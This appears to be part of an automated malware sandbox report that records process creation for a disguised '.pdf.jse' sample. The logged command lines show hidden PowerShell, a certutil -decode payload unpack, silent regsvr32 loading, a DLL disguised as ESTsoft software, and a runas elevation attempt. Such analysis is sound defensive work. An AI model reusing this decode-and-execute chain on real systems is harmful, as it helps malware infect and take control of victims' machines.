Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D17940 | 19_2_00007FF983D17940 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D06950 | 19_2_00007FF983D06950 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D448EC | 19_2_00007FF983D448EC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D09080 | 19_2_00007FF983D09080 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D17020 | 19_2_00007FF983D17020 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D05050 | 19_2_00007FF983D05050 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D09FE0 | 19_2_00007FF983D09FE0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D1AF60 | 19_2_00007FF983D1AF60 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D24EF0 | 19_2_00007FF983D24EF0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D0CEA0 | 19_2_00007FF983D0CEA0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D3CEAC | 19_2_00007FF983D3CEAC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D4BE4C | 19_2_00007FF983D4BE4C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D38DD0 | 19_2_00007FF983D38DD0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D27CFE | 19_2_00007FF983D27CFE |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D46D08 | 19_2_00007FF983D46D08 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D08D10 | 19_2_00007FF983D08D10 |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse' | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf' | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf' | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043 | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a | |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat | |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1 | |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf' | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf' | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043 | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1 | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1 | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | Jump to behavior |
